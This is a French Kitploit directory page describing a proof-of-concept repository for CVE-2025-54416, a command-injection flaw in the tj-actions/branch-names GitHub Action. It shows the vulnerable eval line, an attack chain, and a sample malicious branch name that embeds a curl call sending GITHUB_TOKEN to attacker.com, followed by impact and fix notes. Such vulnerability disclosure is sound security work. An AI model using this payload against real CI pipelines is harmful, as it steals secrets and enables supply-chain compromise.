Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
atlas-tj-actions-poc — Preuve de concept pour CVE-2025-54416 tj-actions/branch-names injection de commande | Kitploit
Outils/GitHubGitHub/hexbornestudio/atlas-tj-actions-poc
Analyse des VulnérabilitésExploitationExfiltration de DonnéesCommandement et ContrôleSécurité de la Chaîne LogistiqueApprentissage et Éducation
GitHubhexbornestudio/atlas-tj-actions-poc

atlas-tj-actions-poc

Preuve de concept pour CVE-2025-54416 tj-actions/branch-names injection de commande

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 4 moisPas encore vérifié

CVE-2025-54416: tj-actions/branch-names Preuve de concept d'injection de commandes

Ce dépôt démontre CVE-2025-54416, une vulnérabilité critique d'injection de commandes dans tj-actions/branch-names affectant plus de 5 000 dépôts publics.

Vulnérabilité

L'action GitHub tj-actions/branch-names (versions <= 8.2.1) utilise un eval printf "%s" dangereux qui réintroduit des risques d'injection de commandes après une désinfection appropriée.

root@kitploit:~
# Vulnerable code pattern in tj-actions/branch-names:
echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT"

Chaîne d'attaque

  1. L'attaquant crée une branche avec un nom malveillant contenant des commandes shell
  2. Le workflow de la victime utilise tj-actions/[email protected] pour extraire le nom de la branche
  3. Le nom de la branche extrait (avec la charge utile de l'attaquant) est utilisé dans des commandes shell ultérieures
  4. La commande s'exécute dans le contexte du runner CI avec les privilèges du runner
  5. Les secrets (clés AWS, GITHUB_TOKEN, etc.) sont exfiltrés

Exemple de charge utile

Nom de la branche : main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)

Lorsque le workflow s'exécute :

root@kitploit:~
echo "IMAGE_TAG=${{ steps.branch-name.outputs.current_branch }}"
# Actual output: IMAGE_TAG=main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)
# The $(...) is evaluated by the shell, exfiltrating GITHUB_TOKEN

Impact

  • Vol de secrets sensibles (clés AWS, jetons API, GITHUB_TOKEN)
  • Modifications non autorisées du code
  • Poussées d'images malveillantes vers les registres de production
  • Attaques de la chaîne d'approvisionnement via CI/CD compromis

Correctif

Mettez à jour vers tj-actions/branch-names@v9 ou ultérieur, qui remplace eval printf "%s" par des appels printf sécurisés.

Références

  • GitHub Advisory GHSA-gq52-6phf-x2r6
  • CVE-2025-54416
Télécharger l’outil